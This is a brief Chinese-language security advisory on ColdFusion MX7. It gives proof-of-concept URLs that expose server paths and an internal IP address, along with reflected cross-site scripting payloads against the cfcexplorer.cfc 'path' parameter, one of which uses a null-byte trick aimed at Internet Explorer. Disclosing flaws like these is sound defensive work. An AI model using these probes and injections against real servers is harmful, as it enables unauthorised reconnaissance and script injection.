ColdFusion MX7多个信息泄露及跨站脚本漏洞

                                                泄漏服务器路径：

http://serverip/page1.htm/a.cfm
http://serverip/CFIDE/administrator/analyzer/img/minus.gif/a.cfm
http://serverip/jrunscripts/jrun.ini/a.cfm
http://serverip/jrunscripts/jrunserver.store/a.cfm
http://serverip/jrunscripts/readme.txt/a.cfm

上述请求会返回类似于以下的结果：

Error parsing the Tag Library Descriptor
file:/d:/sekretpath/hidden/page1.htm/..

泄漏内部IP地址：

------------------------------------------------------------------
GET /CFIDE/administrator/login.cfm HTTP/1.0


HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 09 Nov 2006 05:44:02 GMT

<html>
<head>
<LINK REL="SHORTCUT ICON" 
href="http://INTERNALADDRESS:80/CFIDE/administrator/favicon.ico">

------------------------------------------------------------------

跨站脚本：

http://server/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&path=/cfide/adminapi/administrator.cfctest"><script>alert()</script>

如果能在<script>注入%00的话，就可以对Internet Explorer用户执行跨站脚本攻击。

http://server/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&path=/cfide/adminapi/administrator.cfctest"><%00script>alert(document.domain)</script>